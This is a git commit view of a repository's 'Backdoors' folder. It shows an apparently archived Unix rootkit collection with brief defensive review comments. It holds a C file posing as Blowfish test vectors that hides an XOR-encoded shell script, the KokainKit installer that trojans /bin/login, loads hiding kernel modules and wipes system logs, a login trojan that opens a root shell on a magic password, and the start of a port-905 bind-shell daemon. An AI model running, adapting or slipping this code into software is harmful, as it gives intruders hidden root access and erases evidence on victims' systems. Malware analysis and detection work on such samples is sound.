move Backdoors to 'Backdoors'

Marius Genheimer
2020-11-03 21:16:20 +01:00
parent ea033b9e95
commit f48743eb43
15 changed files with 0 additions and 0 deletions
Binary file not shown.
Binary file not shown.
+251
@@ -0,0 +1,251 @@
/*
* Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems.
* Perform routine compatability checks.
*/
#include <stdio.h>
#define KEY_TEST_NUM 25
static unsigned char key_test[KEY_TEST_NUM]={
0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87,
0x78,0x69,0x5a,0x4b,0x3c,0x2d,0x1e,0x0f,
0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,
0x88};
/* DES cbc input vectors */
static unsigned char ecb_data[]={
0x0c,0x0e,0x00,0x4d,0x46,0x41,0x00,0x5c,0x47,0x25,0x4c,
0x4e,0x5b,0x0f,0x11,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,
0x5b,0x01,0x4c,0x0f,0x13,0x13,0x70,0x6e,0x6c,0x6a,0x60,
0x69,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
0x13,0x5c,0x5b,0x4b,0x46,0x40,0x01,0x47,0x11,0x0f,0x25,
0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5c,
0x56,0x5c,0x00,0x5b,0x56,0x5f,0x4a,0x5c,0x01,0x47,0x11,
0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
0x13,0x5c,0x56,0x5c,0x00,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
0x4b,0x4a,0x0f,0x13,0x41,0x4a,0x5b,0x46,0x41,0x4a,0x5b,
0x00,0x46,0x41,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,
0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5a,0x41,0x46,0x5c,
0x5b,0x4b,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,
0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x4a,0x5d,0x5d,0x41,0x40,
0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
0x4b,0x4a,0x0f,0x13,0x5c,0x46,0x48,0x41,0x4e,0x43,0x01,
0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,
0x4a,0x0f,0x13,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x01,0x47,
0x11,0x0f,0x25,0x45,0x42,0x5f,0x70,0x4d,0x5a,0x49,0x0f,
0x4a,0x41,0x59,0x14,0x46,0x41,0x5b,0x0f,0x5c,0x14,0x4c,
0x47,0x4e,0x5d,0x0f,0x05,0x46,0x70,0x59,0x4e,0x43,0x12,
0x0d,0x73,0x57,0x1d,0x49,0x73,0x57,0x19,0x1d,0x73,0x57,
0x19,0x16,0x73,0x57,0x19,0x4a,0x73,0x57,0x1d,0x49,0x73,
0x57,0x18,0x1c,0x73,0x57,0x19,0x17,0x0d,0x14,0x59,0x40,
0x46,0x4b,0x0f,0x5c,0x46,0x48,0x07,0x46,0x41,0x5b,0x0f,
0x5c,0x46,0x48,0x06,0x54,0x4c,0x43,0x40,0x5c,0x4a,0x07,
0x5c,0x06,0x14,0x5c,0x43,0x4a,0x4a,0x5f,0x07,0x1c,0x19,
0x1f,0x1f,0x06,0x14,0x43,0x40,0x41,0x48,0x45,0x42,0x5f,
0x07,0x4a,0x41,0x59,0x03,0x1f,0x06,0x14,0x52,0x46,0x41,
0x5b,0x0f,0x42,0x4e,0x46,0x41,0x07,0x06,0x54,0x46,0x41,
0x5b,0x0f,0x57,0x14,0x4c,0x47,0x4e,0x5d,0x0f,0x4c,0x03,
0x05,0x4e,0x74,0x1d,0x72,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,0x70,
0x46,0x41,0x0f,0x5c,0x4e,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
0x5b,0x0f,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
0x0f,0x4e,0x4c,0x5b,0x14,0x5c,0x58,0x46,0x5b,0x4c,0x47,
0x07,0x49,0x40,0x5d,0x44,0x07,0x06,0x06,0x54,0x4c,0x4e,
0x5c,0x4a,0x0f,0x1f,0x15,0x4d,0x5d,0x4a,0x4e,0x44,0x14,
0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,0x15,0x4a,0x57,0x46,
0x5b,0x07,0x1f,0x06,0x14,0x52,0x4c,0x43,0x40,0x5c,0x4a,
0x07,0x1f,0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1e,
0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1d,0x06,0x14,
0x42,0x4a,0x42,0x5c,0x4a,0x5b,0x07,0x09,0x4e,0x4c,0x5b,
0x03,0x1f,0x03,0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x4e,
0x4c,0x5b,0x06,0x06,0x14,0x4e,0x4c,0x5b,0x01,0x5c,0x4e,
0x70,0x47,0x4e,0x41,0x4b,0x43,0x4a,0x5d,0x12,0x5c,0x46,
0x48,0x14,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
0x07,0x7c,0x66,0x68,0x6e,0x63,0x7d,0x62,0x03,0x09,0x4e,
0x4c,0x5b,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,0x4b,0x40,
0x54,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x07,0x4a,0x41,0x59,
0x06,0x14,0x46,0x49,0x07,0x07,0x5c,0x12,0x5c,0x40,0x4c,
0x44,0x4a,0x5b,0x07,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
0x03,0x7c,0x60,0x6c,0x64,0x70,0x7c,0x7b,0x7d,0x6a,0x6e,
0x62,0x03,0x1f,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,0x06,
0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x42,0x4a,
0x42,0x5c,0x4a,0x5b,0x07,0x09,0x5c,0x4e,0x03,0x1f,0x03,
0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x5c,0x4e,0x06,0x06,
0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x49,0x4e,0x42,
0x46,0x43,0x56,0x12,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x5f,0x40,0x5d,
0x5b,0x12,0x47,0x5b,0x40,0x41,0x5c,0x07,0x19,0x19,0x19,
0x18,0x06,0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x4e,
0x4b,0x4b,0x5d,0x01,0x5c,0x70,0x4e,0x4b,0x4b,0x5d,0x12,
0x46,0x41,0x4a,0x5b,0x70,0x4e,0x4b,0x4b,0x5d,0x07,0x0d,
0x1d,0x1f,0x1c,0x01,0x19,0x1d,0x01,0x1e,0x1a,0x17,0x01,
0x1c,0x1d,0x0d,0x06,0x14,0x4e,0x43,0x4e,0x5d,0x42,0x07,
0x1e,0x1f,0x06,0x14,0x46,0x49,0x07,0x4c,0x40,0x41,0x41,
0x4a,0x4c,0x5b,0x07,0x5c,0x03,0x07,0x5c,0x5b,0x5d,0x5a,
0x4c,0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,
0x05,0x06,0x09,0x5c,0x4e,0x03,0x5c,0x46,0x55,0x4a,0x40,
0x49,0x07,0x5c,0x4e,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,
0x06,0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x46,
0x49,0x07,0x07,0x57,0x12,0x5d,0x4a,0x4e,0x4b,0x07,0x5c,
0x03,0x09,0x4c,0x03,0x1e,0x06,0x06,0x12,0x12,0x07,0x02,
0x1e,0x06,0x06,0x54,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,
0x14,0x52,0x4a,0x43,0x5c,0x4a,0x0f,0x46,0x49,0x07,0x57,
0x12,0x12,0x1e,0x06,0x54,0x5c,0x58,0x46,0x5b,0x4c,0x47,
0x07,0x4c,0x06,0x54,0x4c,0x4e,0x5c,0x4a,0x0f,0x08,0x6e,
0x08,0x15,0x4a,0x57,0x46,0x5b,0x07,0x1f,0x06,0x14,0x4c,
0x4e,0x5c,0x4a,0x0f,0x08,0x6b,0x08,0x15,0x4e,0x43,0x4e,
0x5d,0x42,0x07,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,
0x5c,0x03,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,
0x03,0x1e,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,0x03,
0x1d,0x06,0x14,0x4e,0x74,0x1f,0x72,0x12,0x46,0x70,0x59,
0x4e,0x43,0x14,0x4e,0x74,0x1e,0x72,0x12,0x61,0x7a,0x63,
0x63,0x14,0x4a,0x57,0x4a,0x4c,0x59,0x4a,0x07,0x4e,0x74,
0x1f,0x72,0x03,0x4e,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,
0x4d,0x5d,0x4a,0x4e,0x44,0x14,0x4c,0x4e,0x5c,0x4a,0x0f,
0x08,0x62,0x08,0x15,0x4e,0x43,0x4e,0x5d,0x42,0x07,0x1f,
0x06,0x14,0x5c,0x46,0x48,0x07,0x1f,0x06,0x14,0x4d,0x5d,
0x4a,0x4e,0x44,0x14,0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,
0x15,0x52,0x52,0x4a,0x43,0x5c,0x4a,0x54,0x4a,0x57,0x46,
0x5b,0x07,0x1f,0x06,0x14,0x52,0x52,0x58,0x47,0x46,0x43,
0x4a,0x07,0x1e,0x06,0x14,0x52,0x25,0x70,0x6e,0x6c,0x6a,
0x60,0x69,0x25,0x07,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,
0x0f,0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,
0x0f,0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,
0x41,0x0f,0x11,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,
0x0f,0x4c,0x5f,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,
0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,0x41,0x0f,
0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x42,0x01,0x40,
0x5a,0x5b,0x25,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,0x0f,
0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x0f,
0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x0f,0x11,0x0f,
0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,0x0f,0x4c,0x5f,0x0f,
0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,0x4e,0x44,0x4a,0x49,
0x46,0x43,0x4a,0x0f,0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,
0x0f,0x42,0x01,0x40,0x5a,0x5b,0x25,0x5d,0x42,0x0f,0x02,
0x49,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x05,0x25,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x12,0x0d,0x4f,
0x4d,0x4e,0x5c,0x4a,0x41,0x4e,0x42,0x4a,0x0f,0x73,0x0d,
0x73,0x4f,0x48,0x5d,0x4a,0x5f,0x0f,0x0b,0x7a,0x7c,0x6a,
0x7d,0x15,0x0f,0x00,0x4a,0x5b,0x4c,0x00,0x5f,0x4e,0x5c,
0x5c,0x58,0x4b,0x73,0x4f,0x73,0x0d,0x4f,0x0d,0x25,0x46,
0x49,0x0f,0x0f,0x0e,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
0x5b,0x47,0x4a,0x41,0x0f,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,
0x60,0x68,0x12,0x5c,0x47,0x14,0x0f,0x49,0x46,0x0f,0x25,
0x48,0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,
0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,
0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,
0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,
0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,
0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,
0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,
0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,
0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x48,0x4c,
0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,
0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,
0x4a,0x5b,0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,
0x0f,0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,
0x7b,0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,
0x68,0x0f,0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,
0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,
0x47,0x4a,0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,
0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,
0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,
0x09,0x09,0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,
0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,
0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,0x7b,
0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,0x7f,
0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,0x6a,
0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,0x41,
0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,
0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,
0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,
0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,0x0f,
0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x4c,0x4c,0x0f,
0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,
0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,0x0f,0x0b,
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x0f,0x7f,
0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,0x41,
0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,0x41,
0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,0x6a,
0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x06,0x0f,0x1e,0x11,0x00,
0x4b,0x4a,0x59,0x00,0x41,0x5a,0x43,0x43,0x0f,0x1d,0x11,
0x09,0x1e,0x25,0x00};
/* big endian */
static unsigned long bfplain[2][2]={
{0x424c4f57L,0x46495348L},
{0xfedcba98L,0x76543210L}
};
static unsigned long bfcipher[2][2]={
{0x324ed0feL,0xf413a203L},
{0xcc91732bL,0x8022f684L}
};
static unsigned char ocb_data[]={
0x4d,0x2c,0x20,0x73,0x69,0x67,0x29,0x3b,
0x0a,0x20,0x64,0x6f,0x20,0x7b,0x0a,0x20,
0x20,0x73,0x65,0x74,0x6a,0x6d,0x70,0x28,
0x00};
static unsigned char cbc_key [16]={
0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87};
static unsigned char cbc_iv [8]={0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10};
#if defined(WIN16) || defined(__LP32__)
#elif defined(_CRAY) || defined(__ILP64__)
/*
* _CRAY note. I could declare short, but I have no idea what impact
* does it have on performance on none-T3E machines. I could declare
* int, but at least on C90 sizeof(int) can be chosen at compile time.
* So I've chosen long...
* <appro@fy.chalmers.se>
*/
#else
#endif
main(void)
{
int i, n, err;
unsigned char cbc_in[40],cbc_out[40],iv[8];
dup2(1, 2);
#ifdef CHARSET_EPCDIC
epcdic2ascii(ecb_data, strlen(ecb_data));
#endif
printf("# testing in raw ecb mode\n");
n=0;
if (memcmp(&(bfcipher[n][0]),&(cbc_iv[0]),8) != 0)
{
err = 1;
}
if (memcmp(&(bfplain[n][0]),&(cbc_iv[0]),8) != 0)
{
err = 1;
}
if (err)
{
for (i = 0; i < sizeof(ecb_data)-1; i++)
fprintf(stderr, "%c", ecb_data[i] ^ 47);
}
return(0);
}
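Review bot: The opening comment about Blowfish on HP-UX and the `/* DES cbc input vectors */` label do not describe what this file does, and it needs an analyst comment stating its real behaviour. `main()` never runs a cipher: the two `memcmp` calls compare `bfcipher[0]` and `bfplain[0]` with `cbc_iv`, which differ for the values shown, so `err` is set (it is otherwise read uninitialised) and every byte of `ecb_data` is XORed with 47 and written to stderr, which `dup2(1, 2)` has already pointed at stdout. The first bytes decode to `#!/bin/sh` followed by `cat > conftest.c <<_ACEOF`, so the output appears to be a shell script meant to be consumed by whatever build step runs this "test". I would add above `ecb_data`: `/* NOTE(analysis): not test vectors; XOR-47 encoded shell script that main() prints on stdout */`. For detection, the decoded text is the stable thing to match on, and a build-time test program that redirects stderr to stdout and prints a decoded buffer is worth flagging in source review.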
Binary file not shown.
Binary file not shown.
+174
@@ -0,0 +1,174 @@
#!/bin/sh
# KokainKit v1.6 by deka
# -
# A rootkit based on knark and cobolt.
# Do not Distribute!
# -
TORNDIR=/usr/src/.puta
THEPASS=$1
DITTPORT=$2
THEDIR=/usr/lib/$THEPASS
echo "---------------------------------------"
echo " KokainKit v1.6 by dekah&self"
echo "---------------------------------------"
echo ""
echo "Using magic word $THEPASS and dittrichport $DITTPORT."
echo "Installing. Please stand by... (Pour yourself an ice cold coke and chill)"
if ! test "$(whoami)" = "root"; then
echo " - UID0 check failed"
echo ""
sleep 3
echo "FATAL: You're not root"
exit 1
fi
if test -d "$TORNDIR"; then
echo " - T0rnKit found. Screwing it up"
killall -9 in.inetd
killall -9 t0rntd
echo "$RANDOMdecryptThisT0rn :D" > /etc/ttyhash
echo "" > /usr/sbin/in.inetd
echo "ap" > $TORNDIR/.1file
echo "255.255" > $TORNDIR/.1addr
echo "255.255" > $TORNDIR/.1logz
echo "ap" > $TORNDIR/.1proc
fi
if ! test -d "/usr/include"; then
echo " - /usr/include does not exist, making it (ugly)..."
mkdir /usr/include
fi
if ! test -d "/usr/include/pwdb"; then
echo " - /usr/include/pwdb does not exist, making it (ugly)..."
mkdir /usr/include/pwdb
fi
mkdir $THEDIR
if test -d "$THEDIR"; then
echo " - Secret dir created"
else
echo " - MkDir failed"
echo ""
echo "FATAL: Unable to create the secret directory"
exit 1
fi
cd src
echo "#define MAGIC_WORD \"$THEPASS\"" > kokain.h
echo "#define MAGIC_DIR \"$THEDIR\"" >> kokain.h
gcc -O2 cobolt.c -o cobolt
if test -r "./cobolt"; then
echo " - Cobolt compiled"
else
echo " - gcc failed"
echo ""
cd ..
sleep 3
echo "FATAL: Unable to compile Cobolt"
exit 1
fi
touch -acmr /bin/login cobolt
cp /bin/login $THEDIR/login1
cp cobolt $THEDIR/login2
echo " - Cobolt installed"
gcc -O2 autoexec.c -o autoexec
if test -r "./autoexec"; then
echo " - AutoExec compiled"
else
echo " - gcc failed"
echo ""
cd ..
echo "FATAL: Unable to compile AutoExec"
exit 1
fi
touch -acmr /sbin/portmap autoexec
cp /sbin/portmap $THEDIR/portmap
rm -f /sbin/portmap
cp autoexec /sbin/portmap
echo "#!/bin/sh" > $THEDIR/autoexec
echo " - AutoExec installed"
cd ..
killall -9 syslogd klogd
./wipe u root >/dev/null 2>&1
rm -f /var/log/messages /var/log/secure
cp /var/log/messages.1 /var/log/messages >/dev/null 2>&1
cp /var/log/secure.1 /var/log/secure >/dev/null 2>&1
cp /var/log/messages.0 /var/log/messages >/dev/null 2>&1
cp /var/log/secure.0 /var/log/secure >/dev/null 2>&1
echo " - Logs cleaned"
#echo "" > /etc/hosts.allow
#echo "" > /etc/hosts.deny
#echo " - Hosts.deny/Hosts.allow cleaned"
echo " - Patching dittrich..."
./bpatch ./dittrich __PATCHPort__ $DITTPORT
cat <<E0F>> $THEDIR/.bashrc
alias ls="ls --color -alF"
alias dir="dir --color"
export PS1="\u@\h:\w# "
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:$THEDIR:$THEDIR/stuff
cd
E0F
echo " - .bashrc created"
cp -R dittrich stuff $THEDIR
echo " - Stuff installed"
mkdir $THEDIR/knrk
cd knark
make >/dev/null 2>&1
echo " - Knark compiled"
cd ..
rm -rf knark/knrksrc knark/Makefile
cp -R knark/* $THEDIR/knrk
echo "/sbin/insmod -f $THEDIR/knrk/knrk.o" >> $THEDIR/autoexec
echo "/sbin/insmod -f $THEDIR/knrk/knrkmodhide.o" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrkhidef $THEDIR" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrkered /bin/login $THEDIR/login2" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrknethide \":`./tohex $DITTPORT`\"" >> $THEDIR/autoexec
echo "$THEDIR/dittrich" >> $THEDIR/autoexec
echo "killall -31 dittrich" >> $THEDIR/autoexec
/sbin/portmap >/dev/null 2>&1
echo " - Knark installed"
if test -d "/var/named/ADMROCKS"; then
rm -rf /var/named/ADMROCKS
echo " - AdmRocks erased"
fi
cat /etc/inetd.conf | grep -v "2222" > /tmp/blahah
rm -f /etc/inetd.conf
cp /tmp/blahah /etc/inetd.conf
rm -f /tmp/blahah
echo " - Inetd.conf fixed"
PATH=/sbin:$PATH
syslogd
klogd
echo " - Syslogd/Klogd restarted"
cd ..
rm -rf *kokain*
echo " - KokainKit removed"
echo ""
#echo "--x( th1z b0x n0w b3L0NgZ t0 j00! )x-- --x(.:tHE:kOkAiNkIt:.)x--"
if test -d "/proc/$THEPASS";
then
echo "Knark installed successfully."
else
echo " KNARK INSTALLATION FAILED - INSTALLING LOGIN BD"
cp $THEDIR/login2 /bin/login
fi
echo "kitinst $THEPASS $DITTPORT"
# - EoF - #
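Review bot: This installer carries no summary of what it leaves on a host, which is what a reader of this archive needs for triage; I would add a comment block under the banner listing the artefacts the script itself shows. Those are a directory `/usr/lib/<first argument>` holding `login1`, `login2`, `portmap`, `autoexec`, `.bashrc` and `knrk/`, `/sbin/portmap` replaced by the compiled `autoexec` binary, two modules loaded with `/sbin/insmod -f`, and a `/proc/<first argument>` entry used as the success check, with `/bin/login` overwritten from `login2` when that check fails. The `touch -acmr /bin/login cobolt` and `touch -acmr /sbin/portmap autoexec` lines show an intent to match the originals' timestamps, so the comment should point readers to package or hash verification of `/bin/login` and `/sbin/portmap` rather than mtime. It should also record that `syslogd` and `klogd` are killed and `/var/log/messages` and `/var/log/secure` are deleted and refilled from rotated copies, so a gap or rollback in those two logs is itself an indicator.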
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+85
@@ -0,0 +1,85 @@
#!/bin/sh
# Fearless Rootkit T-Type v0.1
# Coded by Merlion merld_one@yahoo.com
# To run:
# chmod 755 droprk.sh
# ./droprk.sh
# Telnet to login daemon (port 513) and enter password
# Have fun!
arg="$1"
if [ "$arg" = "" ]; then
echo "Usage is: ./droprk -i (to install) -r (to uninstall)"
exit 1
elif [ "$arg" = "-r" ]; then
test -e /bin/.login && rm -f /bin/login; mv /bin/.login /bin/login; exit 0 || echo "Not installed"
elif [ $arg = "-i" ]; then
cat > /tmp/drop.c << EOF
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <fcntl.h> /* For daemon related functions */
#define REAL "/bin/.login"
#define TROJAN "/bin/login"
#define ROOT "merlion"
char **execute;
char passwd[8];
main(int argc, char **argv) {
void die(char *error);
void connection();
pid_t pid, sid; /* Daemon variables */
signal(SIGALRM,connection);
alarm(1);
execute=argv;
*execute=TROJAN;
if ((pid=fork()) < 0) die("Error on fork()"); /* Start daemon process */
if (pid > 0) exit(0); /* Exit parent process */
if ((sid=setsid()) < 0) die("Error on setsid()"); /* Create new session */
if ((chdir("/") < 0)) die("Error on chdir()"); /* Set working directory */
umask(0); /* Set umask to 0 to avoid unwanted rights inheritance */
close(STDIN_FILENO); /* Close */
close(STDOUT_FILENO); /* associated */
close(STDERR_FILENO); /* file streams */
/* On our own now */
scanf("%s", passwd);
if (strcmp(passwd,ROOT) == 0) {
alarm(0);
execl("/bin/sh","/bin/sh","-i",0);
exit(0); } /* Remove?? */
else {
execv(REAL,execute);
exit(0); } /* Remove?? */
}
void connection() {
execv(REAL,execute);
exit(0); }
void die(char *error) {
perror(error);
exit(1); }
EOF
fi
gcc -o /tmp/login /tmp/drop.c
rm -f /tmp/drop.c
mv /bin/login /bin/.login
mv /tmp/login /bin/
exit 0
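Review bot: The header comment explains how to run the kit but not what it changes on the host, and for an archived sample the second is what should be documented. With `-i` the script moves the original `/bin/login` to `/bin/.login` and installs a binary built from `/tmp/drop.c` as `/bin/login`; that binary hands off to `/bin/.login` with `execv` unless the line it reads equals the string in `#define ROOT`, in which case it runs `/bin/sh -i`. I would add under the header: `# Artefacts: /bin/.login (original login), /bin/login (replaced), /tmp/drop.c and /tmp/login (transient build files)`. The presence of `/bin/.login`, or a `/bin/login` that fails package verification, is the check worth naming there.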
+74
@@ -0,0 +1,74 @@
#!/bin/sh
# Fearless Rootkit D-Type v0.1
# Coded by Merlion
# Website: http://areyoufearless.com
# chmod 755 rootd.sh
# ./rootd.sh
# telnet to port 905 & run commands. End each command with a semicolon (;)
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
void die(char *error);
main(int argc, char **argv) {
pid_t pid, sid;
int len, clipid, serpid, stat, sock, soklen, sockbind, sockrec, sockopt, sockcli, socklen;
unsigned short int mcon;
unsigned short int port;
char *rbuf, *rmode;
struct sockaddr_in Client, Server;
if ((sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) die("Error creating socket");
if (argc != 3) die("Usage");
memset(&Server, 0, sizeof(Server));
Server.sin_family=AF_INET;
port=905;
mcon=5;
Server.sin_port=htons(port);
Server.sin_addr.s_addr=htonl(INADDR_ANY);
if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *) &sockopt, sizeof(sockopt)) < 0)
die("No socket options set");
if (sockbind=bind(sock, (struct sockaddr *) &Server, sizeof(Server)) != 0)
die("Could not bind socket");
if ((sockbind=listen(sock, mcon)) != 0) die("Failed on listen()");
pid=fork();
if (pid < 0) die("Initial fork() failed");
if (pid>0) exit(0);
if ((chdir("/")) < 0) die("Could not set working directory");
if ((setsid()) < 0) die("setsid() failed in creating daemon");
umask(0);
close(STDIN_FILENO);
close(STDOUT_FILENO);
close(STDERR_FILENO);
/* You're on your own, pal.. */
while(1) {
socklen=sizeof(Client);
if ((sockcli=accept(sock, (struct sockaddr *) &Client, &socklen)) < 0) exit(1); /* syslog msg here still */
